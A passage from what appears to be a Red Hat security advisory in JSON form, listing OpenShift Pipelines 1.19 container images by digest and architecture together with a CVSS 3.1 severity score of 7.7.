"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:7df3be21706820ae8c6a16023c5b307a050601b93d1d31151d716545a667d187_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:86baeaf3dbddd6ff68a23ae5af5066c65dddb0b99094f89d4d6cbc504f42b75e_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:dfec2fdadaa700e8867619d6a0e2bd392c1a198404e614d35beda9e73c4ea6a7_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:0bb55fe516ba2a8ff98dde0b6fe0506f41481e353fec8af31754542d88a8ced1_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:5d63e10ac42b901f0293f192f1a96b30158617fed722e9df4b302a7824e8f8c0_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:6ff2fcc539c9a43c39976dc704456ecf125256412b10bbebe8f9313ccecb63fb_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:740796e3da23eb408b732ef14fe87bd9e16653aa26200b23b7d7aa64cb90c686_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:0152bc65a48f3f6f8080fe4ce2802c1ea17590cf05bc9d499d1bc844f8d2432e_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:1f7c8d359b89378e49b8aa120893920194386f3838780bc0a6765c4829171f00_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:7067b2346190b5b6a060c03bf4b4c249a0f80081c05392f5657384b223436fa8_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:c7ef1a29c57398fe47d62b129448d55a322d2ee2e04a4930ef7c324e870e884c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:1c8ffd4b17907e53cb4606524389c89d81cb8ac0b0035cb266dcb411b83a1c77_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:61110ee679b63f7261463b8fcb2d218bdb53e960b1f8531401fd8f6b84470bdb_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:689c505b0dcc89d07d202bb6d6a9bfd6bd4b42438204c1ab79fb050f4bb97fd1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:862321e5cf9e4f17ab8048c7c56a7277306863747eb7d3903effe3a710ce1b30_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:3ff1e00b4be7622fef6df0875e2b7de45d7e36c97137baf5709360c5039e6822_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:63bb3bf9efc2a56f0c5439dfc527437568cb7df62ff7d42d3ce67aa665a1807b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:8a3e77bbe30a6d572d4121a9ff110cdaae889c2b742f10b471b2a23bea8b17b4_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:9c5423a3ca6643833e5fa31725627e188225956d2d06fa68c0ff1f84a237e83c_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:27898aeea13f6905416da9dc611f9812fe6f9fa0dd6a23f346416199c689ff73_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:2b6fb8c0a6413968bdd7e1974dbcb2342a855f921648276bf042104f088f80fb_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:389107e5b5fecdc46867c8e6630260de717fb4296f8ef7060db1b7f8e28b565d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:e8cf6c64e666e7fbe6d98137e96f098359446a43b7f2213d071a9e87dae20292_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:0b481534aeaae1d7a11af954ee26e8f1334b9b12be09a5a93252478b64427216_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:13e8cf0de71719fe4607daf9410a5fb65d6b9747194463fdc52441964fa6e1f8_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:1663f49305a449ac0184ee79ee021f6949a54f6cd8bf573f56c49bb960306a3d_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:f4a1cd38d8588eca71a4e5a8836962b3ccab355fff8b716c3249428fea0e28be_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:412cfc5996d64b54df1c0a67be28991d28a6a92812e4f890f735a219f53fabe2_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:4b8856061808ecbd2c93d4395d4f1328638978512d2f01b5e8f5b649923a8555_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:85a32495af126c1844fb64efc1eb45ffbe2f3069b83d9d1fdd28c8bb348306ba_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:edba5b2a803930afc23735a0d3379aea0fceed51af27cc0cf38142d543f8c4f5_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:2f0d963fdd9681a026c7b377e23090269cccafbca34861b19f3c974f78f8693f_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:3c8e2ac02103cd8634f0e6bdcbe6f5d1466aefe4403a63bc6f9e7bd3893c3c88_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:c77351a76c8d502498d5c7c34bcf4db6373e168607ee47c4b4bebd748a25165c_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:ffbfd0a65b5cd53ad78e186f5d4ef61fe82212f6fd3edba21c97b2c7bbb4104d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:457f91cc3f0aa5489e2c2049df1d9aaa56a52b3c0d9a1e2077455e1aefd5e1fd_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:9024faf5ebb76ea97bb05d13ee5cffaeaef6fc82609c54ce437a2c90caf30edf_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c85d4e0135de82a1a88d2c1420d9d75577e3d09044b246952c44970bfb87aef3_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c8ec07d2152c1de4ef01a848b95c87f0ae4794c25bd6ee80f649f00e38d7218a_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:1099a0d44f0ce925a9c05569d2f8a6854f15ef23cfdf0600eed1ff079f109331_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:57dd3a2b54bf4ce9292498846ea37d6efec0a3c028743c267e69390101b46a4d_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:c2af4a8295ef22ec95616fa4fa7c92502343b726d510b58bbac5fd40d994884d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:fbf7529efa66fa3919e8591f7c0c94219ebef705507b0717dce0d0544946b574_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:171ccb9aac2ff4225d89744322717e715f704cb35a0b8a34d2e83c7fce48e1ae_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:2fd78839231af7af848ca3ca4eda3a3d399a58a8c5c72150b84c7221e1760143_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:41f7fea02b1f40d528316ecf020ff082e0d927e044adc643dbbe14e65faf91f2_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:fb1a1f150f40cc1a524277b6cfa063bec200572a61e4093e8446206438393f76_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:7ea98459bc424770c56ea071d3f9e4656bc944cd1932e8ed2581b263021a2bdc_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:9f1f0e9fce42103820d425d59269863c05222b83846ae486c32cdb7e4e82c975_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:ae8a6df4961b5fa37165369a45d16a2850582464c509bc2f5ff56a6f69c75c35_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:e5c9687b321c0efb0a5ef6cb5bb43a06cb79e8e4c379d045210b7ef18b8bb4e1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a41064dbf7979a87e55aa13842da7b38f0eca58e530e1245650e53b120f3b1b5_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a8188f7256377dec7f491883cb146168c665758647aa55e0a7d7a3fa0769ba00_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:b5ecf03805d9637084db625b5ad3f5c112287d39a2995548208ef7d9f53c925b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:cdf4cf8b73bf4d7445aca34f522aebaa778a996b674359186650c20da6e936c0_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.7,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:3db810d168a5a106e894b3bd701b32af7821f55e83713e98dcc7c3fc19ae0c41_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:914e831a771ccb36b6ef46bf4ced2c05ce2a76a538b3a6785cf047d1782c354c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f869e6005bb36b9d0f2e565059c228b6967b33dc463b69de1dcc6f263e07b1e6_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f8baf73dbf01840d3926d1f259128b2595f221fa0db8e7f0ad54c0c6b2b5a532_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:01d0bac5ae68324714889caad7a6d00974a194706dd6abac16ac600c1acba486_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:39ce75c550fd693dc0bf2ded4e8d15e20e6b8ba7fe63f095d0642c44d3bf3ed5_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:42c27a9a4546aeff7d88be0e1a3a47f23d738b3184b87c09c769fbb2b189d5b8_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:5c786e81facc28108221a2a85e2811b145c4ac5cc0c9c5d1c8b79f518dfc42c2_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:1f3da51efb5c0f7d6ce15ad8b76641a65d6d09be940346f9b5ff833453018ed0_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:2ae4928be71ff1fb0adfb8d014e079c912445a53473400881ac9299332694b80_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:9317d326fc72e99e821a4891e115007761d326f33ee85dbfe3cc62be801d5af6_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:a4ab9fd58865390a4a6d85dc2d91505737539fb547e2b17c57cb72be0acbcf0a_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:1a7f6edbd72dd5e86ca19dd3b57987362dbc17aad5b4bf07eb259ada71c270c9_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:5bdbe4eeced5d4e13831125bb704c8d7e98cd1fd4cc335a39e204a8676f317eb_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:887df82ba16869a9fdf336577a7f7ae9a90713dfbcaa8321f9ec45a20637cc5a_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:dbf71dcf74dd47cbfc5f285640aca82afa3686e98ef32bc025dd3d047d636671_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:068909009a477b980a6b50396a168b1a62235dd203e63a5f11065bb053fbd89c_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:192657fb34d498d7b731e3852abf89265257f7421e1787bd8fde0019805dc823_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2727015d5b29531155977c8bed5422612614d694e28e8a01325340bf7a7410_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2e55ea36197d0e733baea29aa6671ec5b0055a1f58fabb5269d31bf04d8045_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:169b8f0623a6a15aefb7217228197218b4ab9a398cbab01348f9045599c38a57_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:8736b16bee608eba7c8506963419149631fe93bdf30b71c3785391e01b803ba5_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:acbca5c8ed3a1947bea2fda696d84e799fea859e24c4f04256dc7e080fa3e1cf_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:fe1af3bd9efe149c6567a5f14a5b48e2b1b9f41997b081b18cab513b59b55e87_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:03ff8b2feccd7a7fc5b93574042def602fa885e572919674fccb1e516bd6969f_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:28097a799be3dd6d8f500aee2d0ae2ec2a7ccc8a3d2a96a1a4f314a6621ced93_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:4b0c865ca819b32dedd280dc301e719f0efa14e054dd82e43097837ef2627e3f_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:8fe90449d2c94b550e5cac06207d9b65a64683f0878e857cee4a24b94c1b8bf2_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:6f879fcc0f49dd55a32a2394fb366a07fc9d53b7bf90638f7427b08e700efa1a_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:96b66b1b98dc3e1f95aefcf6d0aea9aa7bb9115bcfdf8ae0206da8fe502d7a4a_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ddbbfea6d40e0b978a0715f338aacc758c82a47df12a4ecd46c0ab9ed5bac166_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ef9600ffab4ef449efacb7b74c982215406f74b7fc03d969f93004880c97e3ee_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:1cfb56b8064232ea5e162717b07a9ea77cab7a9e62941ebbd71d95139f52b5e3_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:4f8b2b98e3624a07f121a479dba5368701669f6d444a718883df6b4bf46500bf_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:5aa846a80b2fe91a9eb3ea20496ae4cdfc1f1b4d59708a320d947230cd5287c6_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:6183a74cf4b9c2abbd6511cb94151308f724c85dc63aaea0ae795712f8d48254_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:563c5ae3792c319b3df29c175d7461c48cee2d453170e4285065f3c418e37df0_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:58c4c251e79b007b3bffd7c8436d7b767340ad94eae70d90387d7176d4a5bdf2_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:bf65b6fad64b2761ed6997a1cad0a6f0477b2740561011b30717d0d3f3dd6b7f_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:cdebcfc74dfb2de9d328776d07b8846b0e0394847b72c484a04003edb089cfc4_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:03423a987a3b154dd097d2f207c33928ed184aa27b884a3e3c5e56702d049f12_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:73681e67f2bad4ea91e59dc72552ab3706a72c4bb5d815be9bfc493678b68a25_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:8d7567c15b6e4f6c2d9a882c172293e6cc39abad8bbea1b3b984236cac12a1f6_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:c2072b2c1d3e607cf82e3678325182f6e595f5ea5685385d1cbcad08ef79b61b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:4bf12507f84feb54b8596eb0cd06a0ef7e9f49ebe9c25cc48efb21c89a0d4a07_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:5d968bf07907ef4f6d96b762dcdd78e6f1c77a3febec0ec9140378b57d7e2463_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:7df869f57b816a2bd15d6a15dd9101d0e7aa7664c8bfaf9148a82379a1839b49_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:e5e1c6a36c43eb534694c6274ed2ed16bb855928e419106634734368d8b62031_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:3fbe6b21e0cf29624baf8d73e5b0f184d18abe87ebb728f6da20262cd5c0ab2d_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:5e221f0a70ea5f3076abf10cd119587b59e25d8d224427179a273f0321bb1b58_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:64932159dfd4db8724b2762c421eae8b9e7ab9f1e50bd7e4d2a0f4f45c69d007_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:b6397b063b854abc7f6fdede2081a4277f8a528b59778bd944429b28e8f83bc1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:1591e38eae1b07ce0fc75a9eb60d97126fb7d36eddd5746686e4570fb1b81427_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:37122253ef0ef496790f23fc4ef13f5464d73ed78d51dc445a85fe6230cd998f_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:4cef60130e8555f6b07afa3dde775ad5cce047c8d94ce0f2ff44d48458a019e4_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:63347f53f578ccf70a1ca6ea0ba6cae0baf61bb4331f3800c237104d2d16fb6d_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:3ba0b8bb577b4b14bd16eaa04e450edffbe15841d60f77f6a6541065bec9a28c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:4e4910106fd462265aeb93d67d7de49a7e628561e87bae94b93ef3d9ba4ce427_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:66789297ade19ca33e74ab6b605e812e36af59d4f6fc6c9721624cb7f7e1b900_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:f772e6e7c0f1858aaf0e8ad78e27c4da89db45f9a1c633a9be9da5769ba0a4d7_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:05b517f49080df8cb3943b891c9a13023745df90e0ed99e93c1e3f481fa20e61_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:7df3be21706820ae8c6a16023c5b307a050601b93d1d31151d716545a667d187_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:86baeaf3dbddd6ff68a23ae5af5066c65dddb0b99094f89d4d6cbc504f42b75e_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:dfec2fdadaa700e8867619d6a0e2bd392c1a198404e614d35beda9e73c4ea6a7_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:0bb55fe516ba2a8ff98dde0b6fe0506f41481e353fec8af31754542d88a8ced1_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:5d63e10ac42b901f0293f192f1a96b30158617fed722e9df4b302a7824e8f8c0_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:6ff2fcc539c9a43c39976dc704456ecf125256412b10bbebe8f9313ccecb63fb_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:740796e3da23eb408b732ef14fe87bd9e16653aa26200b23b7d7aa64cb90c686_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:0152bc65a48f3f6f8080fe4ce2802c1ea17590cf05bc9d499d1bc844f8d2432e_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:1f7c8d359b89378e49b8aa120893920194386f3838780bc0a6765c4829171f00_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:7067b2346190b5b6a060c03bf4b4c249a0f80081c05392f5657384b223436fa8_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:c7ef1a29c57398fe47d62b129448d55a322d2ee2e04a4930ef7c324e870e884c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:1c8ffd4b17907e53cb4606524389c89d81cb8ac0b0035cb266dcb411b83a1c77_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:61110ee679b63f7261463b8fcb2d218bdb53e960b1f8531401fd8f6b84470bdb_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:689c505b0dcc89d07d202bb6d6a9bfd6bd4b42438204c1ab79fb050f4bb97fd1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:862321e5cf9e4f17ab8048c7c56a7277306863747eb7d3903effe3a710ce1b30_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:3ff1e00b4be7622fef6df0875e2b7de45d7e36c97137baf5709360c5039e6822_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:63bb3bf9efc2a56f0c5439dfc527437568cb7df62ff7d42d3ce67aa665a1807b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:8a3e77bbe30a6d572d4121a9ff110cdaae889c2b742f10b471b2a23bea8b17b4_ppc64le",
